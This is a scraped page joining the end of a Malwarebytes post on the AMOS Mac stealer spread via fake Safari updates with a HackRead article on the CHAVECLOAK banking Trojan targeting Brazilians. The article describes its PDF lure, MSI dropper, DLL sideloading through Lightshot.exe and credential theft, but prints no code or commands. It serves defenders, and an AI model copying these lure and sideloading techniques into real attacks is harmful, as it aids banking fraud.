In November, Malwarebytes found AMOS being distributed through a malware delivery chain known as “ClearFake.” The ClearFake campaign tricks users into believing they’re downloading an approved web browser update. That has frequently meant a lot of malicious prompts mimicking Google Chrome’s branding and update language, but the more recent campaign imitated the default browser on Mac devices—Safari.

A template is used that mimics the official Apple websites and webpages to convince users into downloading a Safari “update” that instead contains malware.

As Malwarebytes Labs wrote at the time:

> “This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating system.”

****Replace “magic” with Malwarebytes****

Cyberthreats on Mac aren’t non-existent, they’re just different. But different threats still need effective protection, which is where Malwarebytes Premium can help.

Malwarebytes Premium detects and blocks the most common infostealers that target Macs—including AMOS—along with annoying browser hijackers and adware threats such as Genieo, Vsearch, Crossrider, and more. Stay protected, proactively, with Malwarebytes Premium for Mac.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 No “Apple magic” as 11% of macOS detections last year came from malware 

By Deeba Ahmed
The CHAVECLOAK banking Trojan employs PDFs, ZIP downloads, DLL sideloading, and deceptive pop-ups to target Brazil's unsuspecting banking users financial sector. 
This is a post from HackRead.com Read the original post: New CHAVECLOAK Banking Trojan Targets Brazilians via Malicious PDFs

Watch out for the new CHAVECLOAK banking Trojan as it spreads its infection through SMS phishing (SMishing), phishing emails, and compromised websites.

Cybersecurity researchers at FortiGuard Labs have discovered a high-severity Trojan, dubbed CHAVECLOAK, targeting Brazilian banking users. The malware targets Windows devices and accesses online banking platforms, stealing their banking credentials and financial information.

The CHAVECLOAK infection method is under investigation, but researchers suspect potential distribution channels include phishing emails, SMS phishing, and compromised websites.

According to the company’s blog post, the campaign involves malicious emails disguised as legitimate bank communications that could trick users into downloading malware. It then targets unsuspecting users utilising Portuguese language settings, DLL sideloading, and deceptive pop-ups. It actively monitors victims’ interactions with financial portals.

It is worth motioning that DLL sideloading poses a huge security risk because it allows the malware to exploit legitimate processes without raising suspicion or getting detected. 

The malware controls victims’ devices and collects sensitive financial information through a malicious PDF file, claiming to contain contract documents with Portuguese instructions. However, it has a malicious downloader link, which is processed via Goo.su and redirects to a ZIP file, resulting in the MSI file “NotafiscalGFGJKHKHGUURTURTF345.msi.”

When decompressed, the MSI installer revealed multiple TXT files, a legitimate execution file, and a malicious DLL named “Lightshot.dll.” The DLL file’s modified date is more recent than the other files. The installer executes the file “Lightshot.exe” and uses DLL sideloading techniques to execute the malicious DLL. This lets the legitimate executable run the malicious code discreetly, enabling unauthorized activities like data theft. 

Additionally, the malware uses the “GetVolumeInformationW” process to gather file system and volume information, generates a log file, and executes the “Lightshot.exe” program upon user login. It sends HTTP requests, logs data, and monitors the foreground window using the APIs “GetForegroundWindow” and “GetWindowTextW.”

The malware then communicates with its C2 server, facilitating actions to steal a victim’s credentials, blocking their screen, logging keystrokes, and displaying deceptive pop-up windows.

Further, it actively monitors access to financial portals, including Mercado Bitcoin, the largest digital currency exchange in Brazil and Latin America, which combines conventional and cryptocurrency platforms and traditional banks.

The emails with a Docu file containing a malicious PDF file (left) – Alert in Portuguese language stating “Verifying that your computer is secure to access your account.” (right) – Screenshots: FortiGuard Labs

The stolen information is uploaded to different paths. The malware configures account information and sends a POST request. The malware actively monitors victims’ interactions with financial portals, highlighting the sophistication of contemporary banking trojans.

To protect yourself from CHAVECLOAK and similar banking trojans, be cautious with emails and SMS, verify website legitimacy, enable two-factor authentication (2FA), use strong passwords, and regularly update your operating system, web browser, and security software to address known vulnerabilities. Avoid clicking on suspicious links or attachments, and double-check website URLs for typos or minor variations.

1.  TA544 threat actors hit Italian firms with Ursnif banking trojan
2.  New MaliBot Android Malware Found Stealing Personal, Banking Data
3.  European Banking Authority victim in Microsoft Exchange Server hack
4.  Android Banking Malware FjordPhantom Steals Funds Via Virtualization
5.  SpyNote Spyware Returns with SMS Phishing Against Banking Customers

Tag

#auth